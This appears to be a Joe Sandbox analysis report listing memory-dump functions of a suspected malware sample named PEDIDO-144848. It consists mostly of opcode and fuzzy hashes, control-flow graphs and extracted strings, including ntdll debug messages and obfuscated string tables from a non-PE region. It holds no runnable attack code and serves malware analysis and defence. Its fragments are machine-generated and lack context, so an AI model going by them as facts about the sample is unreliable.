                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8986cb56edbd6683af66e961d947c69c64c729251e44eae22da26fd1489574be
                                                        • Instruction ID: 6e2dc3a07112aa77f0ba54ec18cd5d850b97370f6a9cb97cad6ff8791a294eea
                                                        • Opcode Fuzzy Hash: 8986cb56edbd6683af66e961d947c69c64c729251e44eae22da26fd1489574be
                                                        • Instruction Fuzzy Hash: 3490022130201812D502615949146060009D7D1349F92C417E3414519EC6358957B137
                                                        Function 36C42AC0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 690005c13d17f82ffd4b2edd0f579f5ce96e65ae2d135fa2fbb50eb30a4eb971
                                                        • Instruction ID: e2611a6f38e7b9725d9c3e34c7a16905570b24ed7f860e5fdf2f4afd2ca3bec0
                                                        • Opcode Fuzzy Hash: 690005c13d17f82ffd4b2edd0f579f5ce96e65ae2d135fa2fbb50eb30a4eb971
                                                        • Instruction Fuzzy Hash: CC90023160601C12D55071594914746000597D0305F52C417A2014618EC7658A5976B6
                                                        Function 36C42A80 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dc1d118368f899068b6d9ab5b14bc8bd8ec2ee90731bcd15950d156fb845f017
                                                        • Instruction ID: 733cee3b58b781f990393c921a19c2c5fc40c246fcc82d20b0ea025dd87c0a27
                                                        • Opcode Fuzzy Hash: dc1d118368f899068b6d9ab5b14bc8bd8ec2ee90731bcd15950d156fb845f017
                                                        • Instruction Fuzzy Hash: 3E90026120301413450571594914616400A97E0205B52C427E3004554EC5358895713A
                                                        Function 36C42AA0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7a2f22535cf85539bccf7ab0fd4eea1d972153b96ff9a8f7cabe15e7ba5de8f0
                                                        • Instruction ID: 05642d5223f25e3e2f72a3610b91ef689d0d1be446588c130602ff36adc34569
                                                        • Opcode Fuzzy Hash: 7a2f22535cf85539bccf7ab0fd4eea1d972153b96ff9a8f7cabe15e7ba5de8f0
                                                        • Instruction Fuzzy Hash: 5A90023120201C12D50461594D04686000597D0305F52C417A7014619FD67588957136
                                                        Function 36C42A10 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5720125b6da247d54214b89eb9f8e1031c94574cf0f36e882097e2f0dbae8285
                                                        • Instruction ID: ec491d62c8b830cb23ee526cce6c4afc0917ed3188a7cb66e6df2fe9ec5b65db
                                                        • Opcode Fuzzy Hash: 5720125b6da247d54214b89eb9f8e1031c94574cf0f36e882097e2f0dbae8285
                                                        • Instruction Fuzzy Hash: 8B900225222014120545A5590B0450B0445A7D6355392C41BF3406554DC63188696336
                                                        Function 36C42BE0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7257146cb9adb123fa9597f108282523870687d267ea02f6b84d687b45d93516
                                                        • Instruction ID: 5eedde8be4f5904a0f0b6c10a4be266d909efa717e5b2cc8a9a971436fd72f18
                                                        • Opcode Fuzzy Hash: 7257146cb9adb123fa9597f108282523870687d267ea02f6b84d687b45d93516
                                                        • Instruction Fuzzy Hash: 4790022160601812D54071595918706001597D0205F52D417A2014518EC6698A5976B6
                                                        Function 36C42B80 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ce999882f70a222fd51d6aab4098f53acda8e045d2b28b9fd3275d16abf6d125
                                                        • Instruction ID: 647596578ee2dcea4c36f7e3abb22ff5e836075ff4c6c405eeec9b68f0f2df30
                                                        • Opcode Fuzzy Hash: ce999882f70a222fd51d6aab4098f53acda8e045d2b28b9fd3275d16abf6d125
                                                        • Instruction Fuzzy Hash: AF90023120201C52D50061594904B46000597E0305F52C41BA2114618EC625C8557536
                                                        Function 36C42B00 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1d99764939c5ad2717a6d5d496add81719930b571ab27d76cb97bad1ed24904f
                                                        • Instruction ID: 41889e297b90c3b05c46fecfe0bc816addcb20a2ce80b38a4a13435b9915e4d7
                                                        • Opcode Fuzzy Hash: 1d99764939c5ad2717a6d5d496add81719930b571ab27d76cb97bad1ed24904f
                                                        • Instruction Fuzzy Hash: 3390023120605C52D54071594904A46001597D0309F52C417A2054658ED6358D59B676
                                                        Function 36C42B10 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2e3b68cf6d3d9634fc3fed2c09d1cb04beab8cb00bf01e2c896079288d30a7af
                                                        • Instruction ID: 12e14e7002f11e5f4e83ca872c8b45878fbab902728e10a589ca255946e16993
                                                        • Opcode Fuzzy Hash: 2e3b68cf6d3d9634fc3fed2c09d1cb04beab8cb00bf01e2c896079288d30a7af
                                                        • Instruction Fuzzy Hash: 8490023120201C12D5807159490464A000597D1305F92C41BA2015618ECA258A5D77B6
                                                        Function 36C438D0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fed4e65c81b6f91e30c9ef4c4cecbd85fac7d4b8f7973614cc174a9c37cfd513
                                                        • Instruction ID: 24cf065bac4e52425c6677cbc9056f89ab02b74053c5e372fabd4eb5128e7962
                                                        • Opcode Fuzzy Hash: fed4e65c81b6f91e30c9ef4c4cecbd85fac7d4b8f7973614cc174a9c37cfd513
                                                        • Instruction Fuzzy Hash: 3B90022124606512D550715D49046164005B7E0205F52C427A2804558EC56588597236
                                                        Function 36C429D0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 38b63a6fe67ddf11afb7d940f61e01ceba1dda88dc38c65cc8e708870c790479
                                                        • Instruction ID: a07cdf37f30af9a205903f9efad9c268cb2b32cc60edc9ef430dd2df0b39eb66
                                                        • Opcode Fuzzy Hash: 38b63a6fe67ddf11afb7d940f61e01ceba1dda88dc38c65cc8e708870c790479
                                                        • Instruction Fuzzy Hash: D49002A1202154A24900A2598904B0A450597E0205B52C41BE3044524DC5358855A13A
                                                        Function 36C429F0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9925db0a9b6f65ad645fee58811bdfd5d6d522d38bdc4dc0fc16c5d629ec702f
                                                        • Instruction ID: 172f70415b04f97b604247467a9b3e7a0afebbc6e18653bc8c7c31068c45ee1e
                                                        • Opcode Fuzzy Hash: 9925db0a9b6f65ad645fee58811bdfd5d6d522d38bdc4dc0fc16c5d629ec702f
                                                        • Instruction Fuzzy Hash: 7C900225212014130505A5590B04507004697D5355352C427F3005514DD63188656136
                                                        Function 36C42B20 Relevance: .0, Instructions: 2COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                        • Instruction ID: d6fa5d5aeb18bc3b21e49b5cea914bc46505feea2bedf0dbf010fe655e34a192
                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                        • Instruction Fuzzy Hash:
                                                        Function 3690DE2B Relevance: 56.5, Strings: 45, Instructions: 213COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 5 3690de2b-3690e017 6 3690e019-3690e024 5->6 6->6 7 3690e026-3690e041 6->7 8 3690e0d4-3690e0d8 7->8 9 3690e047-3690e060 7->9 11 3690e0fa-3690e0fe 8->11 12 3690e0da-3690e0f7 8->12 10 3690e068-3690e0ca 9->10 10->10 13 3690e0cc-3690e0cd 10->13 14 3690e100-3690e11e 11->14 15 3690e121-3690e125 11->15 12->11 13->8 14->15 16 3690e142-3690e15b 15->16 17 3690e127-3690e13f 15->17 17->16
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570794095.0000000036900000.00000040.00001000.00020000.00000000.sdmp, Offset: 36900000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36900000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                        • API String ID: 0-3558027158
                                                        • Opcode ID: 407fa056566595c576a4764f57daec6c5a4f689614f0c688bf976a87ac242bb0
                                                        • Instruction ID: efa4e7a0a7df891d15aaaf67b3c0fce60956dacad2e09318ceab9ee98ac07fe5
                                                        • Opcode Fuzzy Hash: 407fa056566595c576a4764f57daec6c5a4f689614f0c688bf976a87ac242bb0
                                                        • Instruction Fuzzy Hash: C0914DF04082988AC7158F54A0612AFFFB5EBC6305F15816DE7E6BB243C3BE8905CB85
                                                        Function 36903BB1 Relevance: 31.3, Strings: 25, Instructions: 60COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 195 36903bb1-36903c85 196 36903c88-36903c96 195->196 196->196 197 36903c98-36903cb0 call 369110a8 196->197
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570794095.0000000036900000.00000040.00001000.00020000.00000000.sdmp, Offset: 36900000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36900000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ;%5$";&#$#;$<$#;%;$'!"$$5Rpv$5Tee$5[A5$: &"$;&#5$;'5F$=B|{$=^]A$V}gz$XY95$Xzo|$qzbf$tstg$w^|a$xp:!$ypBp$yyt:$y|~p$|: &$~z<5
                                                        • API String ID: 0-2921030433
                                                        • Opcode ID: 334c17b577a8355afea16a9f35ad22556fd274177893f46976d8191483d2c60d
                                                        • Instruction ID: 8e3c17f41e19f76dd3f511e0802f350bc3037f44d4fc9b50eb4727ec9e9901bc
                                                        • Opcode Fuzzy Hash: 334c17b577a8355afea16a9f35ad22556fd274177893f46976d8191483d2c60d
                                                        • Instruction Fuzzy Hash: 772153B040474DDFCB04CF84E981AEE7B74FF05354F91925DE8096F258C6B2829ACB85
                                                        Function 36CDA1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1032 36cda1f0-36cda269 call 36c12330 * 2 RtlDebugPrintTimes 1038 36cda41f-36cda444 call 36c124d0 * 2 call 36c44b50 1032->1038 1039 36cda26f-36cda27a 1032->1039 1041 36cda27c-36cda289 1039->1041 1042 36cda2a4 1039->1042 1044 36cda28f-36cda295 1041->1044 1045 36cda28b-36cda28d 1041->1045 1046 36cda2a8-36cda2b4 1042->1046 1048 36cda29b-36cda2a2 1044->1048 1049 36cda373-36cda375 1044->1049 1045->1044 1050 36cda2c1-36cda2c3 1046->1050 1048->1046 1051 36cda39f-36cda3a1 1049->1051 1052 36cda2c5-36cda2c7 1050->1052 1053 36cda2b6-36cda2bc 1050->1053 1055 36cda2d5-36cda2fd RtlDebugPrintTimes 1051->1055 1056 36cda3a7-36cda3b4 1051->1056 1052->1051 1058 36cda2cc-36cda2d0 1053->1058 1059 36cda2be 1053->1059 1055->1038 1070 36cda303-36cda320 RtlDebugPrintTimes 1055->1070 1061 36cda3da-36cda3e6 1056->1061 1062 36cda3b6-36cda3c3 1056->1062 1060 36cda3ec-36cda3ee 1058->1060 1059->1050 1060->1051 1067 36cda3fb-36cda3fd 1061->1067 1065 36cda3cb-36cda3d1 1062->1065 1066 36cda3c5-36cda3c9 1062->1066 1071 36cda4eb-36cda4ed 1065->1071 1072 36cda3d7 1065->1072 1066->1065 1068 36cda3ff-36cda401 1067->1068 1069 36cda3f0-36cda3f6 1067->1069 1073 36cda403-36cda409 1068->1073 1074 36cda3f8 1069->1074 1075 36cda447-36cda44b 1069->1075 1070->1038 1080 36cda326-36cda34c RtlDebugPrintTimes 1070->1080 1071->1073 1072->1061 1076 36cda40b-36cda41d RtlDebugPrintTimes 1073->1076 1077 36cda450-36cda474 RtlDebugPrintTimes 1073->1077 1074->1067 1079 36cda51f-36cda521 1075->1079 1076->1038 1077->1038 1083 36cda476-36cda493 RtlDebugPrintTimes 1077->1083 1080->1038 1085 36cda352-36cda354 1080->1085 1083->1038 1090 36cda495-36cda4c4 RtlDebugPrintTimes 1083->1090 1087 36cda377-36cda38a 1085->1087 1088 36cda356-36cda363 1085->1088 1089 36cda397-36cda399 1087->1089 1091 36cda36b-36cda371 1088->1091 1092 36cda365-36cda369 1088->1092 1093 36cda38c-36cda392 1089->1093 1094 36cda39b-36cda39d 1089->1094 1090->1038 1098 36cda4ca-36cda4cc 1090->1098 1091->1049 1091->1087 1092->1091 1095 36cda3e8-36cda3ea 1093->1095 1096 36cda394 1093->1096 1094->1051 1095->1060 1096->1089 1099 36cda4ce-36cda4db 1098->1099 1100 36cda4f2-36cda505 1098->1100 1101 36cda4dd-36cda4e1 1099->1101 1102 36cda4e3-36cda4e9 1099->1102 1103 36cda512-36cda514 1100->1103 1101->1102 1102->1071 1102->1100 1104 36cda507-36cda50d 1103->1104 1105 36cda516 1103->1105 1106 36cda50f 1104->1106 1107 36cda51b-36cda51d 1104->1107 1105->1068 1106->1103 1107->1079
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: HEAP:
                                                        • API String ID: 3446177414-2466845122
                                                        • Opcode ID: 4765b0d1d7236a051600c80a71969a0a0f03e7c40c1fb5fad40e23491eead239
                                                        • Instruction ID: 6ba906cad1a4a750d0160de28a031f408a45ff0fc85d9443b92b9c134722e2a9
                                                        • Opcode Fuzzy Hash: 4765b0d1d7236a051600c80a71969a0a0f03e7c40c1fb5fad40e23491eead239
                                                        • Instruction Fuzzy Hash: 4BA19B75A147128FE704CF69C894A1AB7E6FF88354F14492EEA45DB310EBB0EC46CB91
                                                        Function 36C37550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 36C74592
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 36C74507
                                                        • Execute=1, xrefs: 36C7451E
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 36C74460
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 36C74530
                                                        • ExecuteOptions, xrefs: 36C744AB
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 36C7454D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 0-484625025
                                                        • Opcode ID: 598f2d2c557b240cc7446bd3f2ef9368756db16123c1a73d6cd9e910fcebad44
                                                        • Instruction ID: bbc0e923abe57e8ce5d2cec9912766ad56a719ae3e74f22d04927fc538748a51
                                                        • Opcode Fuzzy Hash: 598f2d2c557b240cc7446bd3f2ef9368756db16123c1a73d6cd9e910fcebad44
                                                        • Instruction Fuzzy Hash: 15513571A01619AEEB119AA5EC99FE977B8EF08344F2004ADE505E7280EB34DA41CF75
                                                        Function 36C1A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • Actx , xrefs: 36C67819, 36C67880
                                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36C677E2
                                                        • SsHd, xrefs: 36C1A304
                                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 36C677DD, 36C67802
                                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36C67807
                                                        • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 36C678F3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                        • API String ID: 0-1988757188
                                                        • Opcode ID: 10ba136904518adff716e0646d8405ebc49f3a62d956d0ccaaf1add1fcd41f4d
                                                        • Instruction ID: 2bd7350b2a1451a6432fc1417538d6ff39ed54101e1842f8155d3d7b191abd72
                                                        • Opcode Fuzzy Hash: 10ba136904518adff716e0646d8405ebc49f3a62d956d0ccaaf1add1fcd41f4d
                                                        • Instruction Fuzzy Hash: 69E10574A087028FE705CFA6C88471A77E1FF88368F544A2DF855CB290DBB1D885DB92
                                                        Function 36C1D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • Actx , xrefs: 36C69315
                                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36C69153
                                                        • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 36C69372
                                                        • GsHd, xrefs: 36C1D794
                                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 36C6914E, 36C69173
                                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36C69178
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                        • API String ID: 3446177414-2196497285
                                                        • Opcode ID: 6ab8c57c3a8ee14905f46e08054f06409bb6ddd6c56ec0df258aa115bfed1874
                                                        • Instruction ID: 8a49afc2db49cc70f379d34cec93a2a4b833a51e0cfc861ed9301bb6a522ca72
                                                        • Opcode Fuzzy Hash: 6ab8c57c3a8ee14905f46e08054f06409bb6ddd6c56ec0df258aa115bfed1874
                                                        • Instruction Fuzzy Hash: 84E1B0B4A083429FE710CF16C8D0B4AF7E4BF88358F544A6EE995CB281D771E945CB92
                                                        Function 36C7FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
